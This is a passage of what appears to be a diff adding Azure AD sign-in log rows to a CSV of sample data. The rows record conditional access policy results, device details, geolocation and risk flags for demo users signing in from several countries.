{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",b125da47-83a8-4791-90e4-983b9d2f0c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,b125da47-83a8-4791-90e4-983b9d2f0c00,SigninLogs,Sucess,41.90428925,-85.99833679
+79,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,10:20.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,64ec5f19-f7ba-429b-b134-b07d5b64a9cf,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:10,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",65ce963c-c870-4311-8389-19e518d50c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,65ce963c-c870-4311-8389-19e518d50c00,SigninLogs,Sucess,41.90428925,-85.99833679
+80,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:29.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",41cc5746-ae7e-445a-962a-17f610500700,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,41cc5746-ae7e-445a-962a-17f610500700,SigninLogs,Sucess,33.0175209,35.44601059
+81,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:49.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9d759ea3-3460-4d2b-aadb-f9b0cdbb2f20,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",d3a3c86e-d6a1-4323-9bc0-1a26ea1c0600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,d3a3c86e-d6a1-4323-9bc0-1a26ea1c0600,SigninLogs,Sucess,50.6406517,5.572050095
+82,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:37.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5ca0a64f-d511-445e-b6be-202dc87b6748,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office Delve,94c63fef-13a3-47bc-8074-75af8c65887a,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 35, 'displayName': 'GBB demo', 'result': 'success', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:55,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",3006daeb-4fa9-44e4-baa4-8ca7f7490800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,low,atRisk,medium,"[
+  ""anonymizedIPAddress""
+]",{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3006daeb-4fa9-44e4-baa4-8ca7f7490800,SigninLogs,Sucess,34.06555176,-118.2405396
+83,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:22.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6a077436-f4af-496a-9510-bf30f8806af7,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:56,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5423bf62-9037-4448-bcaa-303341830600,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,5423bf62-9037-4448-bcaa-303341830600,SigninLogs,Sucess,28,3
+84,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:58.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6a458475-1b46-4605-a400-c7a920460895,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BR,Office Delve,94c63fef-13a3-47bc-8074-75af8c65887a,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 32, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 08:01,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",92c2001d-49e6-496a-951e-7f191d900700,,,"{'countryOrRegion': 'BR', 'geoCoordinates': {'longitude': -47.4056282043457, 'latitude': -20.547510147094727}, 'state': 'Sao Paulo', 'city': 'Franca'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,92c2001d-49e6-496a-951e-7f191d900700,SigninLogs,Sucess,-20.54751015,-47.4056282
+85,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:43.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5509b988-bd2f-4848-84dd-6f93978b1fe9,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:45,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",b58c6208-3745-40bc-8745-ecaab5560800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,low,atRisk,medium,"[
+  ""anonymizedIPAddress""
+]",{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Teams Chat Aggregator,b58c6208-3745-40bc-8745-ecaab5560800,SigninLogs,Sucess,34.06555176,-118.2405396
+86,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:33.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2781abb8-02ef-4fc3-8031-bbcb2fd61fcf,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 